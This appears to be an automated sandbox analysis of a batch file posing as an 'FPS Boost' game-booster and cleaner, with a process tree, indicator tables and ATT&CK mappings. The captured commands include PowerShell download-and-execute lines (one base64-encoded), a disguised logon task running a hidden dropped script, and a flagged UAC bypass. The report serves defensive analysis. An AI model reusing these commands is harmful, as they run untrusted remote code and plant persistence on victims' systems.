1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe

Suspicious use of SendNotifyMessage 27 IoCs

pid	Process
4728	explorer.exe
4728	explorer.exe
4728	explorer.exe
4728	explorer.exe
4728	explorer.exe
4728	explorer.exe
4728	explorer.exe
4728	explorer.exe
4728	explorer.exe
4728	explorer.exe
4728	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe
1788	explorer.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2228	OpenWith.exe
4952	StartMenuExperienceHost.exe
3868	StartMenuExperienceHost.exe
4688	SearchApp.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4456 wrote to memory of 2416	4456	cmd.exe	102
PID 4456 wrote to memory of 2416	4456	cmd.exe	102
PID 4456 wrote to memory of 4336	4456	cmd.exe	103
PID 4456 wrote to memory of 4336	4456	cmd.exe	103
PID 4456 wrote to memory of 4440	4456	cmd.exe	104
PID 4456 wrote to memory of 4440	4456	cmd.exe	104
PID 4440 wrote to memory of 1140	4440	powershell.exe	106
PID 4440 wrote to memory of 1140	4440	powershell.exe	106
PID 4456 wrote to memory of 2668	4456	cmd.exe	108
PID 4456 wrote to memory of 2668	4456	cmd.exe	108
PID 1140 wrote to memory of 4188	1140	cmd.exe	109
PID 1140 wrote to memory of 4188	1140	cmd.exe	109
PID 4456 wrote to memory of 1992	4456	cmd.exe	110
PID 4456 wrote to memory of 1992	4456	cmd.exe	110
PID 4456 wrote to memory of 4112	4456	cmd.exe	111
PID 4456 wrote to memory of 4112	4456	cmd.exe	111
PID 4456 wrote to memory of 4428	4456	cmd.exe	112
PID 4456 wrote to memory of 4428	4456	cmd.exe	112
PID 4456 wrote to memory of 3280	4456	cmd.exe	113
PID 4456 wrote to memory of 3280	4456	cmd.exe	113
PID 4456 wrote to memory of 1084	4456	cmd.exe	114
PID 4456 wrote to memory of 1084	4456	cmd.exe	114
PID 4456 wrote to memory of 1728	4456	cmd.exe	115
PID 4456 wrote to memory of 1728	4456	cmd.exe	115
PID 4456 wrote to memory of 800	4456	cmd.exe	116
PID 4456 wrote to memory of 800	4456	cmd.exe	116
PID 4456 wrote to memory of 596	4456	cmd.exe	117
PID 4456 wrote to memory of 596	4456	cmd.exe	117
PID 4456 wrote to memory of 452	4456	cmd.exe	118
PID 4456 wrote to memory of 452	4456	cmd.exe	118
PID 4456 wrote to memory of 5000	4456	cmd.exe	119
PID 4456 wrote to memory of 5000	4456	cmd.exe	119
PID 4456 wrote to memory of 5012	4456	cmd.exe	120
PID 4456 wrote to memory of 5012	4456	cmd.exe	120
PID 4456 wrote to memory of 3396	4456	cmd.exe	121
PID 4456 wrote to memory of 3396	4456	cmd.exe	121
PID 1140 wrote to memory of 4260	1140	cmd.exe	122
PID 1140 wrote to memory of 4260	1140	cmd.exe	122
PID 1140 wrote to memory of 3492	1140	cmd.exe	123
PID 1140 wrote to memory of 3492	1140	cmd.exe	123
PID 1140 wrote to memory of 4356	1140	cmd.exe	124
PID 1140 wrote to memory of 4356	1140	cmd.exe	124
PID 4456 wrote to memory of 4620	4456	cmd.exe	126
PID 4456 wrote to memory of 4620	4456	cmd.exe	126
PID 4456 wrote to memory of 1484	4456	cmd.exe	127
PID 4456 wrote to memory of 1484	4456	cmd.exe	127
PID 4456 wrote to memory of 3088	4456	cmd.exe	128
PID 4456 wrote to memory of 3088	4456	cmd.exe	128
PID 4456 wrote to memory of 4596	4456	cmd.exe	129
PID 4456 wrote to memory of 4596	4456	cmd.exe	129
PID 4456 wrote to memory of 3788	4456	cmd.exe	130
PID 4456 wrote to memory of 3788	4456	cmd.exe	130
PID 4456 wrote to memory of 3968	4456	cmd.exe	131
PID 4456 wrote to memory of 3968	4456	cmd.exe	131
PID 4456 wrote to memory of 804	4456	cmd.exe	132
PID 4456 wrote to memory of 804	4456	cmd.exe	132
PID 4456 wrote to memory of 532	4456	cmd.exe	133
PID 4456 wrote to memory of 532	4456	cmd.exe	133
PID 4456 wrote to memory of 2568	4456	cmd.exe	134
PID 4456 wrote to memory of 2568	4456	cmd.exe	134
PID 4456 wrote to memory of 4976	4456	cmd.exe	135
PID 4456 wrote to memory of 4976	4456	cmd.exe	135
PID 4456 wrote to memory of 3948	4456	cmd.exe	136
PID 4456 wrote to memory of 3948	4456	cmd.exe	136

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3492	attrib.exe

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\FPS_Boost_1_bat.zip
1⤵
PID:2524

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5000

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap24828:88:7zEvent1126
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1184

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2228

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\FPS Boost 1.bat"
1⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4456
- C:\Windows\system32\mode.com
  mode 128,33
  2⤵
  PID:2416
- C:\Windows\System32\reg.exe
  Reg.exe query "HKU\S-1-5-19\Environment"
  2⤵
  PID:4336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -NoProfile -ExecutionPolicy Bypass "irm https://rentry.co/damnitlol/raw | iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Public\dwn.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1140
  - - C:\Windows\System32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4188
  - - C:\Windows\System32\schtasks.exe
      schtasks /create /tn "Windows updater" /tr "C:\Users\Public\dwn.bat" /sc ONLOGON /ru Admin /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4260
  - - C:\Windows\System32\attrib.exe
      attrib +h "C:\Users\Public\dwn.bat"
      4⤵
      Views/modifies file attributes
      PID:3492
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      PoWeRsHeLL -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -e "aQByAG0AIABoAHQAdABwAHMAOgAvAC8AbQByAHAAZQBwAGUALgBwAHkAdABoAG8AbgBhAG4AeQB3AGgAZQByAGUALgBjAG8AbQAvAGEAcABpAC8AdgAxAC8AdgBpAGUAdwAvAGMAbABlAGEAbgBlAHIAIAB8ACAAaQBlAHgA"
      4⤵
      UAC bypass
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in Drivers directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"
  2⤵
  PID:2668
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " ] " nul
  2⤵
  PID:1992
- C:\Windows\System32\findstr.exe
  findstr /v /a:F /R "^$" " Cleaner " nul
  2⤵
  PID:4112
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " [ " nul
  2⤵
  PID:4428
- C:\Windows\System32\findstr.exe
  findstr /v /a:B /R "^$" " 2 " nul
  2⤵
  PID:3280
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " ] " nul
  2⤵
  PID:1084
- C:\Windows\System32\findstr.exe
  findstr /v /a:F /R "^$" " Game Booster " nul
  2⤵
  PID:1728
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " [ " nul
  2⤵
  PID:800
- C:\Windows\System32\findstr.exe
  findstr /v /a:B /R "^$" " 3 " nul
  2⤵
  PID:596
- C:\Windows\System32\findstr.exe
  findstr /v /a:B /R "^$" " 7 " nul
  2⤵
  PID:452
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " ] " nul
  2⤵
  PID:5000
- C:\Windows\System32\findstr.exe
  findstr /v /a:F /R "^$" " Debloat " nul
  2⤵
  PID:5012
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " [ X to go Back ]" nul
  2⤵
  PID:3396
- C:\Windows\System32\Wbem\WMIC.exe
  wmic process where name="javaw.exe" CALL setpriority "realtime"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4620
- C:\Windows\System32\Wbem\WMIC.exe
  wmic process where name="svchost.exe" CALL setpriority "realtime"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1484
- C:\Windows\System32\findstr.exe
  findstr /v /a:08 /R "^$" " Version 2.0 " nul
  2⤵
  PID:3088
- C:\Windows\System32\findstr.exe
  findstr /v /a:08 /R "^$" " _________________________________________________________________________________" nul
  2⤵
  PID:4596
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " [ " nul
  2⤵
  PID:3788
- C:\Windows\System32\findstr.exe
  findstr /v /a:B /R "^$" " 1 " nul
  2⤵
  PID:3968
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " ] " nul
  2⤵
  PID:804
- C:\Windows\System32\findstr.exe
  findstr /v /a:F /R "^$" " Cleaner " nul
  2⤵
  PID:532
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " [ " nul
  2⤵
  PID:2568
- C:\Windows\System32\findstr.exe
  findstr /v /a:B /R "^$" " 2 " nul
  2⤵
  PID:4976
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " ] " nul
  2⤵
  PID:3948
- C:\Windows\System32\findstr.exe
  findstr /v /a:F /R "^$" " Game Booster " nul
  2⤵
  PID:4332
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " [ " nul
  2⤵
  PID:3700
- C:\Windows\System32\findstr.exe
  findstr /v /a:B /R "^$" " 3 " nul
  2⤵
  PID:1776
- C:\Windows\System32\findstr.exe
  findstr /v /a:B /R "^$" " 7 " nul
  2⤵
  PID:2084
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " ] " nul
  2⤵
  PID:1720
- C:\Windows\System32\findstr.exe
  findstr /v /a:F /R "^$" " Debloat " nul
  2⤵
  PID:4200
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " [ X to go Back ]" nul
  2⤵
  PID:3480
- C:\Windows\System32\findstr.exe
  findstr /v /a:08 /R "^$" " Version 2.0 " nul
  2⤵
  PID:2016
- C:\Windows\System32\findstr.exe
  findstr /v /a:08 /R "^$" " _________________________________________________________________________________" nul
  2⤵
  PID:3036
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " [ " nul
  2⤵
  PID:3180
- C:\Windows\System32\findstr.exe
  findstr /v /a:B /R "^$" " 1 " nul
  2⤵
  PID:3684
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " ] " nul
  2⤵
  PID:2976
- C:\Windows\System32\findstr.exe
  findstr /v /a:F /R "^$" " Cleaner " nul
  2⤵
  PID:4336
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " [ " nul
  2⤵
  PID:1928
- C:\Windows\System32\findstr.exe
  findstr /v /a:B /R "^$" " 2 " nul
  2⤵
  PID:2004
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " ] " nul
  2⤵
  PID:2388
- C:\Windows\System32\findstr.exe
  findstr /v /a:F /R "^$" " Game Booster " nul
  2⤵
  PID:3016
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " [ " nul
  2⤵
  PID:3508
- C:\Windows\System32\findstr.exe
  findstr /v /a:B /R "^$" " 3 " nul
  2⤵
  PID:4444
- C:\Windows\System32\findstr.exe
  findstr /v /a:B /R "^$" " 7 " nul
  2⤵
  PID:3084
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " ] " nul
  2⤵
  PID:3184
- C:\Windows\System32\findstr.exe
  findstr /v /a:F /R "^$" " Debloat " nul
  2⤵
  PID:1404
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " [ X to go Back ]" nul
  2⤵
  PID:2384
- C:\Windows\System32\reg.exe
  Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnablePrefetcher" /t REG_DWORD /d "0" /f
  2⤵
  PID:1920
- C:\Windows\System32\reg.exe
  Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnableSuperfetch" /t REG_DWORD /d "0" /f
  2⤵
  PID:1396
- C:\Windows\System32\reg.exe
  Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnableBoottrace" /t REG_DWORD /d "0" /f
  2⤵
  PID:4376
- C:\Windows\System32\findstr.exe
  findstr /v /a:08 /R "^$" " Version 2.0 " nul
  2⤵
  PID:1648
- C:\Windows\System32\findstr.exe
  findstr /v /a:08 /R "^$" " _________________________________________________________________________________" nul
  2⤵
  PID:4292
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " [ " nul
  2⤵
  PID:828
- C:\Windows\System32\findstr.exe
  findstr /v /a:B /R "^$" " 1 " nul
  2⤵
  PID:2412
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " ] " nul
  2⤵
  PID:4900
- C:\Windows\System32\findstr.exe
  findstr /v /a:F /R "^$" " Cleaner " nul
  2⤵
  PID:4968
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " [ " nul
  2⤵
  PID:4308
- C:\Windows\System32\findstr.exe
  findstr /v /a:B /R "^$" " 2 " nul
  2⤵
  PID:3752
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " ] " nul
  2⤵
  PID:1880
- C:\Windows\System32\findstr.exe
  findstr /v /a:F /R "^$" " Game Booster " nul
  2⤵
  PID:2460
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " [ " nul
  2⤵
  PID:1700
- C:\Windows\System32\findstr.exe
  findstr /v /a:B /R "^$" " 3 " nul
  2⤵
  PID:660
- C:\Windows\System32\findstr.exe
  findstr /v /a:B /R "^$" " 7 " nul
  2⤵
  PID:4712
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " ] " nul
  2⤵
  PID:2696
- C:\Windows\System32\findstr.exe
  findstr /v /a:F /R "^$" " Debloat " nul
  2⤵
  PID:708
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " [ X to go Back ]" nul
  2⤵
  PID:1676
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *3DBuilder* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:388
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *Getstarted* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4032
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *WindowsAlarms* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:532
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *WindowsCamera* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3700
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *bing* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4392
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *MicrosoftOfficeHub* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2452
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *OneNote* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1632
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *people* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *WindowsPhone* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1924
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *solit* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2716
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *WindowsSoundRecorder* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4376
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *windowscommunicationsapps* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *zune* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1992
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *Sway* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:400
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *CommsPhone* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4740
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *ConnectivityStore* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2908
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *Microsoft.Messaging* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4084
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *Facebook* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3668
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *Twitter* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3348
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *Drawboard PDF* | Remove-AppxPackage"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2820
- C:\Windows\System32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d 1 /f
  2⤵
  PID:3980
- C:\Windows\System32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSuperHidden" /t REG_DWORD /d 1 /f
  2⤵
  - Modifies visiblity of hidden/system files in Explorer
  PID:4284
- C:\Windows\System32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideFileExt" /t REG_DWORD /d 0 /f
  2⤵
  - Modifies visibility of file extensions in Explorer
  PID:560
- C:\Windows\System32\taskkill.exe
  taskkill /f /im explorer.exe
  2⤵
  - Kills process with taskkill
  PID:1476
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Boot or Logon Autostart Execution: Active Setup
  - Enumerates connected drives
  - Checks SCSI registry key(s)
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4728
- C:\Windows\System32\findstr.exe
  findstr /v /a:08 /R "^$" " Version 2.0 " nul
  2⤵
  PID:2004
- C:\Windows\System32\findstr.exe
  findstr /v /a:08 /R "^$" " _________________________________________________________________________________" nul
  2⤵
  PID:3944
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " [ " nul
  2⤵
  PID:1480
- C:\Windows\System32\findstr.exe
  findstr /v /a:B /R "^$" " 1 " nul
  2⤵
  PID:4048
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " ] " nul
  2⤵
  PID:224
- C:\Windows\System32\findstr.exe
  findstr /v /a:F /R "^$" " Cleaner " nul
  2⤵
  PID:2384
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " [ " nul
  2⤵
  PID:3324
- C:\Windows\System32\findstr.exe
  findstr /v /a:B /R "^$" " 2 " nul
  2⤵
  PID:3472
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " ] " nul
  2⤵
  PID:2976
- C:\Windows\System32\findstr.exe
  findstr /v /a:F /R "^$" " Game Booster " nul
  2⤵
  PID:1648
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " [ " nul
  2⤵
  PID:2944
- C:\Windows\System32\findstr.exe
  findstr /v /a:B /R "^$" " 3 " nul
  2⤵
  PID:3308
- C:\Windows\System32\findstr.exe
  findstr /v /a:B /R "^$" " 7 " nul
  2⤵
  PID:2460
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " ] " nul
  2⤵
  PID:4260
- C:\Windows\System32\findstr.exe
  findstr /v /a:F /R "^$" " Debloat " nul
  2⤵
  PID:3404
- C:\Windows\System32\findstr.exe
  findstr /v /a:8 /R "^$" " [ X to go Back ]" nul
  2⤵
  PID:4620

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4952

C:\Windows\explorer.exe
explorer.exe
1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1788

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3868

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4688

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:1968

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:4472

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:3276

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:3296

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:2968

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:1628

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:2496

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3544

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:4728

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:388

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3196

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:5020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
56c43715e0e7fa58012d8a5769d8d568

SHA1
4370ca3436f2e3a95b47a728503a2c22a5a5fa39

SHA256
